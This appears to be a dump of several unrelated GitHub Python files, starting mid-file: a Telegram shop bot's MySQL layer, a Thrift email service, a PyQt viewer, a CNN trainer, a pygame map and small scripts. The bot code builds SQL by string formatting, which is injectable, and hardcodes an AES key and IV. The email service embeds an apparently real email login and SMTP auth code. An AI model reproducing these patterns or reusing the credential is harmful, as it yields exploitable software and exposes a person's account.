conn.commit()\n result_db = await cur.fetchall()\n await cur.execute(select4botmaker)\n await conn.commit()\n curbing_repeat_bot = await cur.fetchall()\n for row in curbing_repeat_bot:\n if row[0] and row[1]:\n dic_bot_user_id[row[0].decode('utf8')] = row[1].decode('utf8')\n dic_user_id_bot[row[1].decode('utf8')] = row[0].decode('utf8')\n if row[1].decode('utf8') not in list_bot_id:\n list_bot_id.append(row[1].decode('utf8'))\n await cur.execute(select4chargebot)\n await conn.commit()\n db2mem4charge_bot = await cur.fetchall()\n for row in db2mem4charge_bot:\n if row[1] and row[0]:\n dic4charge_bot_id2token[row[1].decode('utf8')] = row[0].decode('utf8')\n\n for row in result_db:\n if row[1]:\n row1 = row[1].decode('utf8')\n row2 = row[2].decode('utf8')\n temp_bot_un = row[4].decode('utf8')\n temp_bot_date = row[3]\n if row1:\n if row1 not in dict4bot_ids4users:\n dict4bot_ids4users[row1] = []\n if temp_bot_un not in dict4bot_ids4users[row1]:\n dict4bot_ids4users[row1].append(temp_bot_un)\n\n Date_bot[temp_bot_un] = temp_bot_date\n user_id4owner[row2] = str(row1) + row2\n UNT_Dict[row[0]] = [row1, row2, temp_bot_date]\n await cur.execute(createtable4seller.format(table4seller = row[0]))\n await cur.execute(select_all_seller.format(table4seller = row[0]))\n await conn.commit()\n result_sellers = await cur.fetchall()\n seller_dict[row1 + row2] = []\n for seller_row in result_sellers:\n seller_row1 = seller_row0 = None\n if seller_row[1]:\n seller_row1 = seller_row[1].decode('utf8')\n if seller_row[0]:\n seller_row0 = seller_row[0].decode('utf8')\n seller_dict[row1 + row2].append([seller_row1, seller_row0])\n table4citypost = \"post4city_\" + str(row[0])\n await cur.execute(createtable4citypost.format(table4citypost = table4citypost))\n await conn.commit()\n await cur.execute(db2mem_citypost.format(table4citypost = table4citypost))\n await conn.commit()\n citypost_iter = await cur.fetchall()\n for citypost in citypost_iter:\n if citypost[0] and citypost[1]:\n citypost_0 = citypost[0].decode('utf8') \n citypost_1 = citypost[1].decode('utf8')\n if row[0] not in dict_citypost:\n dict_citypost[row[0]] = []\n dict_citypost[row[0]].append([citypost_0, citypost_1])\n table4customer = \"sec_customer_\" + str(row[0])\n await cur.execute(create_customer_table.format(table4customer = table4customer))\n await conn.commit()\n await cur.execute(select4customer.format(table4customer = table4customer))\n await conn.commit()\n iter4customer_chars = await cur.fetchall()\n for customer_chars in iter4customer_chars:\n if row[0] not in dic_user_id:\n dic_user_id[row[0]] = []\n dic_user_id[row[0]].append(customer_chars[0].decode('utf8'))\n for index in range(1, len(customer_chars)-1):\n if customer_chars[index]:\n list4customer_chars[index-1][customer_chars[0].decode('utf8') + row2] = customer_chars[index].decode('utf8')\n dict_token2e_num[row2] = row[0]\n else:\n return True\n\n elif flag_Update_Token == 2:\n for U_id in changeindb:\n Temp_Exchange_Token = save_new_token[U_id]\n Exchange_Token = (U_id, Temp_Exchange_Token[1])\n await cur.execute(Update_Token, Exchange_Token)\n await conn.commit()\n\n elif flag_Update_Token == 3:\n create_table_seller = \"sec_sell_\" + str(kwargs[\"table_name\"])\n temp_key = kwargs[\"key_acc\"]\n table_seller = (dic_first_button.get(temp_key),\n dic_secound_button.get(temp_key),\n dic_title.get(temp_key),\n dic_context.get(temp_key),\n dic_price_ware.get(temp_key),\n dic_currency_ware.get(temp_key),\n dic_unit_ware.get(temp_key),\n dic_discount.get(temp_key),\n dic_photo_file.get(temp_key),\n file_id.get(temp_key),\n day_code.get(temp_key))\n\n create_other_table = (\"CREATE TABLE IF NOT EXISTS \" + create_table_seller + \" (\"\n \"`emp_nu` int(12) NOT NULL AUTO_INCREMENT,\"\n \"`first_button` Text NULL,\"\n \"`secound_button` Text NULL,\"\n \"`title` Text NULL,\"\n \"`context` Text NULL,\"\n \"`price_ware` Text NULL,\"\n \"`currency_ware` Text NULL,\"\n \"`unit_ware` Text NULL,\"\n \"`discount` Text NULL,\"\n \"`photo_file` Text NULL,\"\n \"`file_id` Text NULL,\"\n \"`showindays` Text NULL,\"\n \"PRIMARY KEY(emp_nu));\")\n\n save_in_other_table = (\"SET block_encryption_mode = 'aes-256-cbc'; \"\n \"SET @key_str = SHA2('My secret passphrase',512);\"\n \"SET @init_vector = 'h>1&cr!a[v+qm&3b+F6*P~'; \"\n \"INSERT IGNORE INTO \"+create_table_seller+\"(\"\n \"first_button, secound_button, title, context, currency_ware, price_ware, unit_ware, discount, photo_file, file_id, showindays)\"\n \"VALUES(AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector),\"\n \"AES_ENCRYPT(%s,@key_str, @init_vector));\")\n\n await cur.execute(create_other_table)\n await conn.commit()\n await cur.execute(save_in_other_table, table_seller)\n await conn.commit()\n\n elif flag_Update_Token == \"chang_token\":\n await cur.execute(update_token.format(Bot_id = kwargs[\"bot_id\"], Token = kwargs[\"new_token\"]))\n await conn.commit()\n\n elif flag_Update_Token == \"give_bot_id4ch_t\":\n give_bot_id = \"\"\"SET @ENCRYPT_User_id = '{User_id}'; \n select AES_DECRYPT(Bot_ID,@key_str, @init_vector) from Token_Takjoy where @ENCRYPT_User_id = AES_DECRYPT(User_id, @key_str, @init_vector);\"\"\"\n await cur.execute(pre_secure)\n await conn.commit()\n await cur.execute(give_bot_id.format(User_id = str(kwargs[\"user_id\"])))\n await conn.commit()\n result_bot_names = await cur.fetchall()\n return result_bot_names\n\n elif flag_Update_Token == \"charge_bot\":\n charge_bot_table = \"\"\"SET @ENCRYPT_Bot_id = '{Bot_id}';\n UPDATE Token_Takjoy SET `Bot_Date` = DATE_ADD(`Bot_Date` , INTERVAL {Daysetting} DAY)\n where Bot_id = AES_ENCRYPT(@ENCRYPT_Bot_id,@key_str, @init_vector)\"\"\"\n await cur.execute(pre_secure)\n await conn.commit()\n await cur.execute(charge_bot_table.format(Bot_id = kwargs[\"bot_id\"], Daysetting = str(kwargs[\"day\"])))\n await conn.commit()\n return\n\n elif flag_Update_Token == \"create_db4citypost\":\n table4citypost = \"post4city_\" + str(kwargs[\"table_name\"])\n createtable4citypost = (\"\"\"CREATE TABLE IF NOT EXISTS {table4citypost}(\n `citypost_no` int(12) NOT NULL AUTO_INCREMENT,\n `city_name` Text not NULL,\n `post_purchase` Text not NULL,\n PRIMARY KEY(citypost_no));\"\"\")\n save_in_citypost = (\"\"\"INSERT IGNORE INTO {table4citypost}(city_name, post_purchase)\n VALUES(AES_ENCRYPT('{city_name}',@key_str, @init_vector),\n AES_ENCRYPT('{post_purchase}',@key_str, @init_vector));\"\"\")\n await cur.execute(pre_secure)\n await conn.commit()\n await cur.execute(createtable4citypost.format(table4citypost = table4citypost))\n await conn.commit()\n await cur.execute(save_in_citypost.format(table4citypost = table4citypost, city_name = kwargs[\"city_name\"], post_purchase = kwargs[\"post_purchase\"]))\n await conn.commit()\n\n elif flag_Update_Token == \"db4citypost\":\n table4citypost = \"post4city_\" + str(kwargs[\"table_name\"])\n createtable4citypost = (\"\"\"CREATE TABLE IF NOT EXISTS {table4citypost}(\n `citypost_no` int(12) NOT NULL AUTO_INCREMENT,\n `city_name` Text not NULL,\n `post_purchase` Text not NULL,\n PRIMARY KEY(citypost_no));\"\"\")\n take_from_citypost = (\"\"\"select AES_DECRYPT(city_name,@key_str, @init_vector),\n AES_DECRYPT(post_purchase,@key_str, @init_vector)\n from {table4citypost};\"\"\")\n edit_citypost = (\"\"\"update {table4citypost} set `city_name` = AES_ENCRYPT('{city_name}',@key_str, @init_vector),\n `post_purchase` = AES_ENCRYPT('{city_name}',@key_str, @init_vector) where\n `city_name` = AES_ENCRYPT('{ex_city_name}',@key_str, @init_vector);\"\"\")\n delete_citypost = (\"\"\"DELETE FROM {table4citypost} where `city_name` = AES_ENCRYPT('{city_name}',@key_str, @init_vector);\"\"\")\n await cur.execute(pre_secure)\n await conn.commit()\n await cur.execute(createtable4citypost.format(table4citypost = table4citypost))\n await conn.commit() \n if kwargs['ctrl_account'] == \"take_from_citypost\":\n await cur.execute(take_from_citypost.format(table4citypost = table4citypost))\n await conn.commit()\n result_sellers = await cur.fetchall()\n return result_sellers \n elif kwargs['ctrl_account'] == \"edit_citypost\":\n await cur.execute(edit_citypost.format(table4citypost = table4citypost, city_name = kwargs[\"city_name\"], post_purchase = kwargs[\"purchaseofcity\"], ex_city_name = kwargs[\"ex_city_name\"]))\n await conn.commit()\n elif kwargs['ctrl_account'] == \"delete_citypost\":\n await cur.execute(delete_citypost.format(table4citypost = table4citypost, city_name = kwargs[\"city_name\"]))\n await conn.commit() \n\n elif flag_Update_Token ==\"account_db\":\n table4account = \"account_\" + str(kwargs[\"table_num\"])\n createtable4citypost = (\"\"\"CREATE TABLE IF NOT EXISTS {table4account}(\n `account_no` int(12) NOT NULL AUTO_INCREMENT,\n `account_num` Text not NULL,\n `account_name` Text not NULL,\n PRIMARY KEY(account_no));\"\"\")\n save_in_citypost = (\"\"\"INSERT IGNORE INTO {table4account}(account_num, account_name)\n VALUES(AES_ENCRYPT('{account_num}',@key_str, @init_vector),\n AES_ENCRYPT('{account_name}',@key_str, @init_vector));\"\"\")\n take_from_db = (\"\"\"select AES_DECRYPT(`account_num`,@key_str, @init_vector) from {table4account};\"\"\")\n take_all_from_db = (\"\"\"select AES_DECRYPT(`account_num`,@key_str, @init_vector), AES_DECRYPT(`account_name`,@key_str, @init_vector) from {table4account};\"\"\")\n Delete_from_db = (\"\"\"Delete from {table4account} where '{account_num}' = AES_DECRYPT(`account_num`,@key_str, @init_vector);\"\"\")\n await cur.execute(pre_secure)\n await conn.commit()\n await cur.execute(createtable4citypost.format(table4account = table4account))\n await conn.commit()\n result_db = await cur.fetchall()\n if kwargs['ctrl_account'] == \"save_in_db\":\n await cur.execute(save_in_citypost.format(table4account = table4account, account_num = kwargs[\"account_num\"], account_name = kwargs[\"account_name\"]))\n await conn.commit()\n elif kwargs['ctrl_account'] == \"take_from_db\":\n await cur.execute(take_from_db.format(table4account = table4account))\n await conn.commit()\n result_account = await cur.fetchall()\n Temp_account = []\n for accounts in result_account:\n Temp_account.append(accounts[0].decode('utf8'))\n return Temp_account\n elif kwargs['ctrl_account'] == \"Delete_from_db\":\n await cur.execute(Delete_from_db.format(table4account = table4account, account_num = kwargs[\"account_num\"]))\n await conn.commit()\n elif kwargs['ctrl_account'] == \"take_all_from_db\":\n await cur.execute(take_all_from_db.format(table4account = table4account))\n await conn.commit()\n result_all_account = await cur.fetchall()\n return result_all_account\n await cur.close()\n conn.close()\n","repo_name":"m2khosravizadeh/Ex_Takjoybot","sub_path":"first/db_takjoy.py","file_name":"db_takjoy.py","file_ext":"py","file_size_in_byte":19509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24877854377","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nsys.path.append(\"/\")\nfrom message.api import MessageService\nfrom thrift.transport import TSocket\nfrom thrift.transport import TTransport\nfrom thrift.protocol import TBinaryProtocol\nfrom thrift.server import TServer\n\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.header import Header\n\n#发送email的邮箱和授权码\nsender = \"15604288825@163.com\"\nauthCode = \"xj199804025511hl\"\nclass MessageServiceHandler:\n def sendMobileMessage(self, mobile, message):\n print(\"sendMobileMessage,mobile:\"+mobile+\",message:\"+message)\n return True\n\n def sendEmailMessage(self, email, message):\n print(\"sendEmailMessage,Email:\" + email + \",message:\" + message)\n #create text\n messageObj = MIMEText(message,\"plain\",\"utf-8\")\n messageObj['From'] = sender\n messageObj['To'] = email\n messageObj['Subject'] = Header(\"徐俊的邮件\",\"utf-8\")\n\n try:\n smtpObj = smtplib.SMTP('smtp.163.com')\n smtpObj.login(sender,authCode)\n #send email\n smtpObj.sendmail(sender,email,messageObj.as_string())\n except smtplib.SMTPException as ex:\n print(\"send email filed ...\")\n print(ex)\n return False\n\n print(\"send email success ...\")\n return True\n\nif __name__ == '__main__':\n handler = MessageServiceHandler()\n processor = MessageService.Processor(handler)\n transport = TSocket.TServerSocket(None, \"9090\")\n tfactory = TTransport.TFramedTransportFactory()\n pfactory = TBinaryProtocol.TBinaryProtocolFactory()\n\n server = TServer.TSimpleServer(processor, transport, tfactory, pfactory)\n print (\"python thrift server start\")\n server.serve()\n print (\"python thrift server exit\")\n","repo_name":"xvjun/microservice","sub_path":"message-thrift-python-service/message/message_service.py","file_name":"message_service.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72188258887","text":"\"\"\"\n @author: Austin Edwards\n\n View for displaying, adding, and removing ImageManagerFileTable data\n\n\"\"\"\n\nfrom PyQt5.QtWidgets import QMainWindow, QTableWidget, QHeaderView\n\nfrom views.image_manager_view_ui import Ui_ImageManagerMainWindow\nfrom controllers.image_manager_ctrl import ImageManagerController\nimport numpy as np\nimport pandas as pd\n\nclass ImageManagerView(QMainWindow):\n def __init__(self, model, main_controller):\n \n super().__init__()\n\n self._model = model\n self._main_controller = main_controller\n\n self._ui = Ui_ImageManagerMainWindow()\n self._ui.setupUi(self)\n self._ui.addImageButton.clicked.connect(self._main_controller.request_image_files)\n self._ui.removeImageButton.clicked.connect(self.remove_images)\n\n self._ui.imageManagerTableView.setSelectionBehavior(QTableWidget.SelectRows)\n self._ui.imageManagerTableView.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)\n \n self._ui.imageManagerTableView.setModel(self._model)\n\n def remove_images(self):\n \"\"\" Sends selected indexes to delete to file table model \"\"\"\n print(\"REMOVE\")\n self._model.delete_row(self._ui.imageManagerTableView.selectedIndexes())\n\n def closeEvent(self, event):\n \"\"\" Lets the controller know that the window has been closed so that the current image can be updated \"\"\"\n \n event.accept()\n \n if len(self._model._filelist) > 0:\n self._main_controller.file_manager_window_close()\n","repo_name":"awedwards/multiview-image-data-explorer","sub_path":"views/image_manager_view.py","file_name":"image_manager_view.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"30243575858","text":"from sys import stdin\n\ndef y(n):\n result = []\n for i in range(1, n+1):\n if n%i == 0:\n result.append(i)\n return result\n\ndef x(nlist: list, v:int):\n result = \"\"\n for i in nlist[:-1]:\n for j in nlist[1:]:\n if i+j == v:\n result = \"yes\"\n return result\n result = \"no\"\n return result\n\n\nT = int(input())\nfor i in range(T):\n A, B = map(int, stdin.readline().split())\n tmp = y(A)\n print(x(tmp, B))\n continue","repo_name":"taza0912/daily_coding","sub_path":"BOJ(Baekjoon_Online_Judge)/baekjoon_1402.py","file_name":"baekjoon_1402.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42694284079","text":"#!/usr/bin/env python3\nimport click\nimport soco\n\n@click.command()\n@click.argument(\"sonos_ip\")\n@click.argument(\"stream_url\")\ndef cli(sonos_ip, stream_url):\n \"\"\"Plays the given STREAM_URL on the SONOS_IP device\"\"\"\n speaker = soco.SoCo(sonos_ip)\n speaker.clear_queue()\n speaker.add_uri_to_queue(stream_url)\n speaker.play_from_queue(0)\n\ndef main():\n cli(prog_name=\"sonos-play\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"denysvitali/sonos-live-stream","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"20764290424","text":"import scipy.io as sio\nimport numpy as np\nimport tensorflow as tf\nimport random\nfrom sklearn.preprocessing import *\nfrom time import *\nimport os\nimport matplotlib.pyplot as plt\nfrom pylab import *\nfrom sklearn.preprocessing import MinMaxScaler\nfrom PIL import Image\n\n###下面是讲解python怎么读取.mat文件以及怎么处理得到的结果###\nload_fn = 'F:/zhicheng/张森师兄训练数据/ToZZC/feature_10.mat'\nprint(load_fn)\nload_data = sio.loadmat(load_fn)\n# load_matrix = load_data['matrix']\n# 假设文件中存有字符变量是matrix,例如matlab中save(load_fn, 'matrix');\n# 当然可以保存多个save(load_fn, 'matrix_x', 'matrix_y', ...);\n# load_matrix_row = load_matrix[0]\n# 取了当时matlab中matrix的第一行,python中数组行排\n# print(np.split(load_data['feature.P']))\na = load_data['feature'][0]\na = a[0]\ntemp = a[1]\nyj = a[2]\nyj = yj[0]\n\nfwj = a[3]\nfwj = fwj[0]\n# print(\"方位角:\", fwj)\n\ninput_data = np.transpose(temp) # 整理输入\n# print(\"input_data\", input_data)\n# print(\"仰角\", yj)\n\ntrain_data = []\ntest_data = []\nfwjtrainlabel = []\nfwjtestlabel = []\nyjtrainlabel = []\nyjtestlabel = []\ntest_accuracy_list=[]\nCKPT_DIR = 'C:/Users/Administrator/Desktop/owndatatest1/'\n\nfilename = 'C:/Users/Administrator/Desktop/owndatatest2/'\nfilename2 = 'C:/Users/Administrator/Desktop/owndatatest3/'\nfor pic in os.listdir(filename):\n im = Image.open(filename + pic)\n im2 = np.array(im)\n train_data.append(im2)\ntrain_data = np.array(train_data)\n\n\nfor pic in os.listdir(filename2):\n im = Image.open(filename + pic)\n im2 = np.array(im)\n test_data.append(im2)\ntest_data = np.array(test_data)\n\nfor i in range(0, 3360):\n yjtrainlabel.append(yj[i])\nfor i in range(3360, 3840):\n yjtestlabel.append(yj[i]) # 整理标签\n\n\ndata1 = np.array(yjtrainlabel)\nvalues1 = data1\nlabel_encoder1 = LabelEncoder()\ninteger_encoded1 = label_encoder1.fit_transform(values1)\n# print(integer_encoded)\n\nonehot_encoder1 = OneHotEncoder(sparse=False)\ninteger_encoded1 = integer_encoded1.reshape(len(integer_encoded1), 1)\nonehot_encoded1 = onehot_encoder1.fit_transform(integer_encoded1)\nYtrain_onehot = np.array(onehot_encoded1)\n\nprint(\"Ytrain_onehot-----------------\", Ytrain_onehot)\n\n\ndata2 = yjtestlabel\nvalues2 = np.array(data2)\n# print(values)\n\nlabel_encoder2 = LabelEncoder()\ninteger_encoded2 = label_encoder2.fit_transform(values2)\n# print(integer_encoded)\n\nonehot_encoder2 = OneHotEncoder(sparse=False)\ninteger_encoded2 = integer_encoded2.reshape(len(integer_encoded2), 1)\nonehot_encoded2 = onehot_encoder2.fit_transform(integer_encoded2)\nprint(\"onehot_encoded2----------------\", onehot_encoded2)\n\n\n# 初始化过滤器\ndef weight_variable(shape):\n return tf.Variable(tf.truncated_normal(shape, stddev=0.1))\n\n\n# 初始化偏置,初始化时,所有值是0.1\ndef bias_variable(shape):\n return tf.Variable(tf.constant(0.1, shape=shape))\n\n\n# 卷积运算,strides表示每一维度滑动的步长,一般strides[0]=strides[3]=1\n# 第四个参数可选\"Same\"或\"VALID\",“Same”表示边距使用全0填充\ndef conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding=\"SAME\")\n\n\n# 池化运算\ndef max_pool_2x2(x):\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding=\"SAME\")\n\n\n# 创建x占位符,用于临时存放MNIST图片的数据,\n# [None, 784]中的None表示不限长度,而784则是一张图片的大小(28×28=784)\nx = tf.placeholder(tf.float32, [None, 28, 28])\n# y_存的是实际图像的标签,即对应于每张输入图片实际的值\ny_ = tf.placeholder(tf.float32, [None, 8])\n\n# 将图片从784维向量重新还原为28×28的矩阵图片,\n# 原因参考卷积神经网络模型图,最后一个参数代表深度,\n# 因为MNIST是黑白图片,所以深度为1,\n# 第一个参数为-1,表示一维的长度不限定,这样就可以灵活设置每个batch的训练的个数了\nx_image = tf.reshape(x, [-1, 28, 28, 1])\n\n# 第一层卷积\n# 将过滤器设置成5×5×1的矩阵,\n# 其中5×5表示过滤器大小,1表示深度,因为MNIST是黑白图片只有一层。所以深度为1\n# 32表示卷积在经过每个5×5大小的过滤器后可以算出32个特征,即经过卷积运算后,输出深度为32\nW_conv1 = weight_variable([5, 5, 1, 32])\n# 有多少个输出通道数量就有多少个偏置\nb_conv1 = bias_variable([32])\n# 使用conv2d函数进行卷积计算,然后再用ReLU作为激活函数\nh_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)\n\nW_conv3 = weight_variable([5, 5, 32, 32])\n# 有多少个输出通道数量就有多少个偏置\nb_conv3 = bias_variable([32])\n# 使用conv2d函数进行卷积计算,然后再用ReLU作为激活函数\nh_conv3 = tf.nn.relu(conv2d(h_conv1, W_conv3) + b_conv3)\n\nW_conv5 = weight_variable([5, 5, 32, 32])\n# 有多少个输出通道数量就有多少个偏置\nb_conv5 = bias_variable([32])\n# 使用conv2d函数进行卷积计算,然后再用ReLU作为激活函数\nh_conv5 = tf.nn.relu(conv2d(h_conv3, W_conv5) + b_conv5)\n\n\nh_pool1=max_pool_2x2(h_conv5)\n# 卷积以后再经过池化操作\n#h_pool1 = max_pool_2x2(h_conv1)\n\n\n\n\n\n# 第二层卷积\n# 因为经过第一层卷积运算后,输出的深度为32,所以过滤器深度和下一层输出深度也做出改变\nW_conv2 = weight_variable([5, 5, 32, 64])\nb_conv2 = bias_variable([64])\nh_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)\n\nW_conv4 = weight_variable([5, 5, 64, 64])\nb_conv4 = bias_variable([64])\nh_conv4 = tf.nn.relu(conv2d(h_conv2, W_conv4) + b_conv4)\n\nh_pool2 = max_pool_2x2(h_conv4)\n\n# 全连接层\n# 经过两层卷积后,图片的大小为7×7(第一层池化后输出为(28/2)×(28/2),\n# 第二层池化后输出为(14/2)×(14/2)),深度为64,\n# 我们在这里加入一个有1024个神经元的全连接层,所以权重W的尺寸为[7 * 7 * 64, 1024]\nW_fc1 = weight_variable([7 * 7 * 64, 1024])\n# 偏置的个数和权重的个数一致\nb_fc1 = bias_variable([1024])\n# 这里将第二层池化后的张量(长:7 宽:7 深度:64) 变成向量(跟上一节的Softmax模型的输入一样了)\nh_pool2_flat = tf.reshape(h_pool2, [-1, 7 * 7 * 64])\n# 使用ReLU激活函数\nh_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n\n# dropout\n# 为了减少过拟合,我们在输出层之前加入dropout\nkeep_prob = tf.placeholder(tf.float32)\nh_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n\n# 输出层\n# 全连接层输入的大小为1024,而我们要得到的结果的大小是10(0~9),\n# 所以这里权重W的尺寸为[1024, 10]\nW_fc2 = weight_variable([1024, 8])\nb_fc2 = bias_variable([8])\n# 最后都要经过Softmax函数将输出转化为概率问题\ny_conv = tf.nn.softmax(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)\n\n# 损失函数和损失优化\n#cross_entropy = tf.reduce_sum(y_ * tf.log(y_conv))\n# coss_entropy=tf.losses.sparse_softmax_cross_entropy(labels=y_,logits=y_conv)\ncross_entropy = tf.reduce_mean (\n tf.nn.softmax_cross_entropy_with_logits (labels = y_, logits = y_conv))#损失函数,交叉熵方法\n# train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\ntrain_step= tf.train.GradientDescentOptimizer(0.001).minimize(cross_entropy)\n\n# 测试准确率,跟Softmax回归模型的一样\ncorrect_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n\n# 开始训练\nwith tf.Session() as sess:\n # 初始化所有变量\n sess.run(tf.global_variables_initializer())\n saver=tf.train.Saver(max_to_keep=3)\n # 训练两万次\n for i in range(20000):\n # # 每次获取50张图片数据和对应的标签\n # batch1 = train_data.next_batch(50)\n # batch2=test_data.next_batch(50)\n # # 每训练100次,我们打印一次训练的准确\n train_accuracy = sess.run(accuracy, feed_dict={x: train_data, y_: Ytrain_onehot, keep_prob: 0.5})\n print(\"step %d, training accuracy %g\" % (i, train_accuracy))\n sess.run(train_step, feed_dict={x: train_data, y_: Ytrain_onehot, keep_prob: 0.5})# 这里是真的训练,将数据传入\n #train_step.run(feed_dict={x: train_data, y_: Ytrain_onehot, keep_prob: 0.5})\n test_accuracy = sess.run(accuracy, feed_dict={x: test_data, y_: onehot_encoded2, keep_prob: 1.0})\n test_accuracy_list.append(test_accuracy)\n if i%5000 == 0:\n saver.save(sess, CKPT_DIR+'model.ckpt',global_step=i)\n if i % 100 == 0:\n print(test_accuracy)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"kdzhangzhicheng/cnntrainowndata","sub_path":"cnnyj.py","file_name":"cnnyj.py","file_ext":"py","file_size_in_byte":8532,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"73588458889","text":"from constants import *\r\nfrom board_and_rules import Board, GameRules, PlayGame\r\nfrom mcts import Node, MCTS\r\n\r\nclass PlayVsAI(PlayGame, MCTS):\r\n\r\n def __init__(self):\r\n super().__init__()\r\n\r\n def play_vs_mcts(self, num_iters, num_sims=1, hide_evaluations=True):\r\n while self.is_terminal(self.game) == \"-\":\r\n move = self.input_move(\"x\")\r\n self.make_move_(self.game, move)\r\n self.print_board()\r\n\r\n if self.is_terminal(self.game) != \"-\":\r\n break\r\n\r\n move = self.search(self.game, move, num_iters, num_sims, hide_evaluations=hide_evaluations)\r\n print(move_keys_inv[move[0]])\r\n self.make_move_(self.game, move)\r\n self.print_board()\r\n print(self.is_terminal(self.game), \"wins!\")\r\n\r\nif __name__ == '__main__':\r\n run = PlayVsAI()\r\n run.play_vs_mcts(10000)\r\n ","repo_name":"BevandaIvan/uttt-mcts","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"128197331","text":"# Solved on 2021.01.04\n# 2667 단지번호붙이기 ver.BFS\n\n# ---------------------------\n\nfrom collections import deque\nimport sys\ninput = sys.stdin.readline\n\n\ndef bfs(board, x, y, visited):\n global count\n\n queue = deque()\n queue.append((x, y))\n\n visited[x][y] = True\n count += 1\n\n dx = [-1, 1, 0, 0]\n dy = [0, 0, -1, 1]\n\n while queue:\n a, b = queue.popleft()\n for i in range(4):\n nx = a + dx[i]\n ny = b + dy[i]\n\n if nx < 0 or ny < 0 or nx >= n or ny >= n:\n continue\n elif not visited[nx][ny] and board[nx][ny] == 1:\n queue.append((nx, ny))\n visited[nx][ny] = True\n count += 1\n\n\nn = int(input())\nboard = []\nvisited = [[False] * n for _ in range(n)]\ncount = 0\nnum = 0\nc = []\n\n\nfor _ in range(n):\n board.append(list(map(int, input().rstrip())))\n\nfor i in range(n):\n for j in range(n):\n if board[i][j] == 1 and not visited[i][j]:\n bfs(board, i, j, visited)\n c.append(count)\n count = 0\n num += 1\n\nprint(num)\nc.sort()\nfor i in c:\n print(i)\n","repo_name":"gemstoneyang/Algorithm","sub_path":"BOJ/DFS_and_BFS/2667_2.py","file_name":"2667_2.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9829919055","text":"import pygame\nfrom pygame.locals import DOUBLEBUF, QUIT, KEYUP, K_ESCAPE\nimport sys\n\npygame.init()\n\n# 디스플레이 초기화\nDISPLAYSURF = pygame.display.set_mode((640, 480), DOUBLEBUF)\npygame.display.set_caption(\"등축 투영\")\n\n\n# 맵 데이터: (1) 벽, (0) 바닥\nmap_data = [\n [1, 1, 1, 1, 1],\n [1, 0, 0, 0, 1],\n [1, 0, 0, 0, 1],\n [1, 0, 0, 0, 1],\n [1, 0, 0, 0, 1],\n [1, 1, 0, 0, 1],\n [1, 1, 0, 0, 1],\n [1, 1, 1, 1, 1],\n]\n\n# 타일 이미지 로드\nwall = pygame.image.load(\"map_tset01.png\").convert_alpha()\ngrass = pygame.image.load(\"map_test02.png\").convert_alpha()\nTILEWIDTH = 64 # 타일 너비\nTILEHEIGHT = 64 # 타일 높이\nTILEHEIGHT_HALF = TILEHEIGHT / 2\nTILEWIDTH_HALF = TILEWIDTH / 2\n\n# 타일 배치\nfor row_nb, row in enumerate(map_data):\n for col_nb, tile in enumerate(row):\n if tile == 1:\n tileImage = wall\n else:\n tileImage = grass\n cart_x = row_nb * TILEWIDTH_HALF\n cart_y = col_nb * TILEHEIGHT_HALF\n iso_x = cart_x - cart_y\n iso_y = (cart_x + cart_y) / 2\n centered_x = DISPLAYSURF.get_rect().centerx + iso_x\n centered_y = DISPLAYSURF.get_rect().centery / 2 + iso_y\n DISPLAYSURF.blit(tileImage, (centered_x, centered_y))\n\n# 게임 실행\nFPSCLOCK = pygame.time.Clock()\nwhile True:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n if event.type == KEYUP:\n if event.key == K_ESCAPE:\n pygame.quit()\n sys.exit()\n\n pygame.display.flip()\n FPSCLOCK.tick(30)","repo_name":"kywon22/2DGP-project_2021184019","sub_path":"dummy/past/map_state.py","file_name":"map_state.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} 